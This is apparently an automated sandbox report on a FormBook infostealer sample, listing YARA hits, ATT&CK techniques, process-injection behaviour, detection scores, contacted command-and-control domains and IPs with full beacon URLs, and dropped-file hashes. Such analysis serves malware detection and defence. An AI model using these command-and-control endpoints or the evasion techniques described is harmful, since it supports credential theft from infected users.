          Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.729403220.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.692880282.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10010DF5 cpuid
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery251Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery113Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528714 Sample: TT COPY_02101011.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 33 www.helpfromjames.com 2->33 35 www.dandftrading.com 2->35 37 4 other IPs or domains 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 6 other signatures 2->51 11 TT COPY_02101011.exe 17 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\wdtzbwxasut.dll, PE32 11->31 dropped 67 Injects a PE file into a foreign processes 11->67 15 TT COPY_02101011.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 Queues an APC in another process (thread injection) 15->75 18 explorer.exe 15->18 injected process9 dnsIp10 39 www.blttsperma.quest 37.123.118.150, 49820, 80 UK2NET-ASGB United Kingdom 18->39 41 www.le-hameau-enchanteur.com 213.186.33.5, 49784, 80 OVHFR France 18->41 43 11 other IPs or domains 18->43 53 System process connects to network (likely due to code injection or exploit) 18->53 55 Performs DNS queries to domains with low reputation 18->55 57 Uses netstat to query active network connections and open ports 18->57 22 NETSTAT.EXE 18->22         started        25 autoconv.exe 18->25         started        signatures11 process12 signatures13 59 Self deletion via cmd delete 22->59 61 Modifies the context of a thread in another process (thread injection) 22->61 63 Maps a DLL or memory area into another process 22->63 65 Tries to detect virtualization through RDTSC time measurements 22->65 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TT COPY_02101011.exe36%VirustotalBrowse
          TT COPY_02101011.exe16%ReversingLabsWin32.Trojan.Nemesis

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll16%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.TT COPY_02101011.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.TT COPY_02101011.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.TT COPY_02101011.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.TT COPY_02101011.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          0.2.TT COPY_02101011.exe.2a30000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.NETSTAT.EXE.372796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.TT COPY_02101011.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.NETSTAT.EXE.d6e840.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.TT COPY_02101011.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.le-hameau-enchanteur.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          www.helpfromjames.com/e8ia/0%Avira URL Cloudsafe
          http://www.blttsperma.quest/e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz0%Avira URL Cloudsafe
          http://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz0%Avira URL Cloudsafe
          http://www.yesrecompensas.lat/e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz0%Avira URL Cloudsafe
          http://www.intelldat.com/e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz0%Avira URL Cloudsafe
          http://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz0%Avira URL Cloudsafe
          http://www.le-hameau-enchanteur.com/e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.le-hameau-enchanteur.com
          		213.186.33.5
          		truetrueunknown
          www.blttsperma.quest
          		37.123.118.150
          		truetrue
            		unknown
            www.bestinvest-4-you.com
            		104.21.31.204
            		truetrue
              		unknown
              helpfromjames.com
              		185.65.236.168
              		truetrue
                		unknown
                webartsolution.net
                		198.54.125.56
                		truetrue
                  		unknown
                  www.yesrecompensas.lat
                  		3.96.23.237
                  		truetrue
                    		unknown
                    www.gadget198.xyz
                    		172.67.158.42
                    		truetrue
                      		unknown
                      w2y6q8s9.stackpathcdn.com
                      		151.139.128.11
                      		truetrue
                        		unknown
                        intelldat.com
                        		143.95.80.65
                        		truetrue
                          		unknown
                          wss.easycompanies.com.au
                          		13.210.99.21
                          		truefalse
                            		unknown
                            www.weprepareamerica-planet.com
                            		208.91.197.27
                            		truefalse
                              		unknown
                              www.webartsolution.net
                              		unknown
                              		unknowntrue
                                		unknown
                                www.mcclureic.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.henleygirlscricket.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.intelldat.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.dandftrading.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.helpfromjames.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          www.helpfromjames.com/e8ia/true
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.blttsperma.quest/e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uztrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uztrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.yesrecompensas.lat/e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uztrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.intelldat.com/e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uztrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uztrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.le-hameau-enchanteur.com/e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uztrue
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://nsis.sf.net/NSIS_ErrorTT COPY_02101011.exefalse
                                            		high
                                            http://nsis.sf.net/NSIS_ErrorErrorTT COPY_02101011.exefalse
                                              		high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              37.123.118.150
                                              		www.blttsperma.questUnited Kingdom
                                              		13213UK2NET-ASGBtrue
                                              213.186.33.5
                                              		www.le-hameau-enchanteur.comFrance
                                              		16276OVHFRtrue
                                              185.65.236.168
                                              		helpfromjames.comUnited Kingdom
                                              		33968INTERNETENGINEERINGASGBtrue
                                              198.54.125.56
                                              		webartsolution.netUnited States
                                              		22612NAMECHEAP-NETUStrue
                                              151.139.128.11
                                              		w2y6q8s9.stackpathcdn.comUnited States
                                              		20446HIGHWINDS3UStrue
                                              143.95.80.65
                                              		intelldat.comUnited States
                                              		62729ASMALLORANGE1UStrue
                                              3.96.23.237
                                              		www.yesrecompensas.latUnited States
                                              		16509AMAZON-02UStrue
                                              172.67.158.42
                                              		www.gadget198.xyzUnited States
                                              		13335CLOUDFLARENETUStrue

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:528714
                                              Start date:25.11.2021
                                              Start time:17:47:24
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 26s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:TT COPY_02101011.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@8/2@13/8
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 24.9% (good quality ratio 22.6%)
                                              • Quality average: 75.3%
                                              • Quality standard deviation: 31%
                                              HCA Information:
                                              • Successful, ratio: 89%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 92.122.145.220
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                              • Not all processes where analyzed, report is missing behavior information

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              37.123.118.150XKLyPH8fil.exeGet hashmaliciousBrowse
                                              • www.piperskara.quest/bcwg/?n2Jxc2=LQgramtgvz9gpRCm69Bgg9zYzNqDoKXe/xoOYyM20y9Hdwqa+bZJQ26d8/uTsQZaK3jtWYMCag==&y2JxkH=7nx4wVHx1hZHPtlP
                                              Citation-HEQ211025001T-EXPP v4,pdf.exeGet hashmaliciousBrowse
                                              • www.badkyker.quest/b62n/?0N645BeP=eFIp1pQq3ETUGTceTruOFOJ1dQmPu2LEZmadZ4szDyfrUCBwXGEH/Drl48Om3GOk+gVG&vVSdF=CPGHuRZ
                                              VSL_MV SEA-BLUE SHIP OWNERS.exeGet hashmaliciousBrowse
                                              • www.blttsperma.quest/e8ia/?m0D8S=cRcPqDD8gRHP&3f0LiN=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS
                                              Order.exeGet hashmaliciousBrowse
                                              • www.sytypij.xyz/jy0b/?gR-P5L=JDHDbHM0&j2Jp=eYa2jAjhrU72L3WVpxH9jsjNT0srQ2ahDVTWcuHziu1GnXFZstAE4JmEMDfUnYWcFCv5
                                              New Offer.exeGet hashmaliciousBrowse
                                              • www.oporbagehi.quest/ecus/?d6AdKh=KpN4wErd7wd6llqzpYzMQWPswpobIZ1kAW5Qs8tqKzxMxpJ7Q8ocWbT+8LJmfPS2zarQ&IfRL=5jZ4UJDHJvFlB8
                                              202111161629639000582.exeGet hashmaliciousBrowse
                                              • www.atinokvanta.quest/wkgp/?2dX=P6APITtHDX2tmpK&4h5=npCMCl+RregmTw6cx8+byq65zg7h1u/lJ5mbqhiD7E8vI14+TRkcHQFH1Zs3yeqswACN
                                              vGULtWc6Jh.exeGet hashmaliciousBrowse
                                              • www.krallechols.quest/scb0/?NBZ4cP=XHAF2WnuIR8IW6HytrV3Cr1d9KXYf9+Xd4qi9e8E1EN5vKa6DU4i1iuF59U9gzfK/Tw0tTlNxw==&q6h=5jxdANKPGHO8HP5p
                                              7OjVU04f8q.exeGet hashmaliciousBrowse
                                              • www.heglemrca.quest/gtc5/?8ph=lCkVMu55gkgFdbVVVGZph8qEoSdcluTQL+LKOCcEpF7+otlKd5QeJhNynVws+cZ9KW9V&U0GDa=fB_X46C
                                              rfq.exeGet hashmaliciousBrowse
                                              • www.hrtogjort.quest/s2qi/?MhBd9XLx=HbGGlsNKynhRn1OZSUDTcU11jE9KquvSJxsaBbHywHdHvBVsuicee/3hTkOTqTMLFva3&C48h=pVtdTPKHwt9dZ63P
                                              DHL50458006SHP.exeGet hashmaliciousBrowse
                                              • www.hoedetamni.quest/gab8/?r6VTf8yP=Zf6VUcDVhu0aqEZvSUrwMEMdRMHbm2PdB59ahhn3b7f2yp7kqyIqWmK4U818rxqelde0&gPtX=0b0L5phHSpgxbZl0
                                              DuxgwH47QB.exeGet hashmaliciousBrowse
                                              • www.tuuttidisney.quest/cfn8/?wZEhNtn=GNR/cswsNXaTiqGvaiOTwsMtTfgjjwHaPXMbbiwu1L+Zpp8z0hBER1I6yfXZZZrQ1pKU&7ntP2=G2JlCZwhJ8t
                                              SWIFT-MLSB-11,546__doc.exeGet hashmaliciousBrowse
                                              • www.mtliglhare.quest/ubw4/?VZYl2Vp=qL1mP/x0XSkEHwyuRhVdYoin7gtKozj3LYPYdVwNJXx54g06P5J7f6F5vLOjeL9T1oXj&G4=1bnHHhbxClV
                                              PRODUCT LIST.exeGet hashmaliciousBrowse
                                              • www.aprilsaak.quest/r4gk/?6l=3fjP&1bm0IRS8=dD2+aeCUO1pkqpyruayuoeI20NWaZ6jY1kQ6if7hU6jXgmj08xN16ajd8indwcDO0NbIixWhaw==
                                              SWIFT DOCUMENT COPY.exeGet hashmaliciousBrowse
                                              • www.corajevedrai.quest/upwd/?x8=hpO3CcePYc3prcoIGVA6owp1UQBNNFXR4gqjueTrWIrEzkWp/yee+5MWCTf63rWqID1C&xtHlu=0puh52O0_h
                                              Payment Order.exeGet hashmaliciousBrowse
                                              • www.stabisville.quest/nurc/?n0Gpir=xERCAQBI2m4XRT5CLsnYgM+az/rVRLQ1H441UzEPFH2QLlvjvR24zCN7skS1qjoDAA+XcrVssg==&TvZl=6lHLirfHDXX034Pp
                                              SOA & INV FOR OCT'21.exeGet hashmaliciousBrowse
                                              • www.ctenemuhos.quest/u0n0/?EZl=KZxX4F_xJ&e64=fcUCpViyTx4uxXwUqP+G8p0RJhbnp/Z5ub+Zi25WexS7pBXOke7f54ZjxydeLif1AgF3
                                              Purchase Contract.xlsxGet hashmaliciousBrowse
                                              • www.tyralruutan.quest/ht08/?bxl0i=0LfY3BA00YnG8e5qQo14XrLHsratMBYj67fE9qBxS9FBqgxOIw3Kg+qKVmnM3o0/QqiBVg==&vv-hIb=4hgpGxNXe
                                              Quotation No. 1687R.exeGet hashmaliciousBrowse
                                              • www.sundaytejero.quest/snec/?V4tH=KdT+8tt7OUCbDfTw0fk36Q5Xf/UpdKxEg1K3hHLxh6D05f55cX0U/jLAC3JjknW7yeD82nGrpw==&hD=-Zl0iNBHyhVpI
                                              HCCuazHtYM.exeGet hashmaliciousBrowse
                                              • www.sittedarren.quest/sywu/?Wdcl=fHRuPhyQjgmYV5E+eKHhA+2gSo4Cg/nheMJ8Ybl6zEGQxH+hZl6uDzrGB7nkpCNUypvn&f0=6lux
                                              Enquiry Reference Number 0025559278.exeGet hashmaliciousBrowse
                                              • www.kermmehienon.quest/u0n0/?2d0Xs=E6PhrdPh&j0DxqnKx=TP634yAaw8AegrTYjeROOFA+5EuX4ENZ2Qm/rilUcShsZcOxcZkZp/kd1VI3lEZa/kSo

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              www.blttsperma.questVSL_MV SEA-BLUE SHIP OWNERS.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              Original Shipment Doc Ref 2853801324189923,PDF.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              www.bestinvest-4-you.comPOSGORSGL2110210416.exeGet hashmaliciousBrowse
                                              • 104.21.31.204
                                              wss.easycompanies.com.auVSL_MV SEA-BLUE SHIP OWNERS.exeGet hashmaliciousBrowse
                                              • 13.210.99.21
                                              NEW ORDER 3742.exeGet hashmaliciousBrowse
                                              • 13.55.94.210
                                              Swift001.exeGet hashmaliciousBrowse
                                              • 13.55.94.210

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              UK2NET-ASGBXKLyPH8fil.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              Citation-HEQ211025001T-EXPP v4,pdf.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              VSL_MV SEA-BLUE SHIP OWNERS.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              Order.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              New Offer.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              202111161629639000582.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              vGULtWc6Jh.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              2YnVgiNH23Get hashmaliciousBrowse
                                              • 83.170.125.27
                                              7OjVU04f8q.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              rfq.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              DHL50458006SHP.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              DuxgwH47QB.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              SWIFT-MLSB-11,546__doc.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              PRODUCT LIST.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              SWIFT DOCUMENT COPY.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              Payment Order.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              SOA & INV FOR OCT'21.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              Purchase Contract.xlsxGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              Quotation No. 1687R.exeGet hashmaliciousBrowse
                                              • 37.123.118.150
                                              HCCuazHtYM.exeGet hashmaliciousBrowse
                                              • 37.123.118.150

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\5itxry81kuzl8up3
                                              Process:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):219451
                                              Entropy (8bit):7.993798564303036
                                              Encrypted:true
                                              SSDEEP:6144:XXWWWWWWWWWWWWWW9+HY+ryMDZ5cejsybkgbx+1Tzh+VWwCfQ5R:nWWWWWWWWWWWWWW9+DykZmeAk/9sNoWA
                                              MD5:7CFBCCD72474438D7FC638703213241C
                                              SHA1:45DA096B227587739BE2CFD1FD216A7A0FC40A9A
                                              SHA-256:02E9F10A4673CF06DC6DED72098E6D37E6162B5C88937EB67EBBFC0C0EE39D58
                                              SHA-512:66B38FD3C6A4A9C85338E13776204A65A4BE9323357C7758472946F2CC21ECE513D4DF4790CF232D109083365360046BE38732725F09B56D5FC0BF4B0CC0629B
                                              Malicious:false
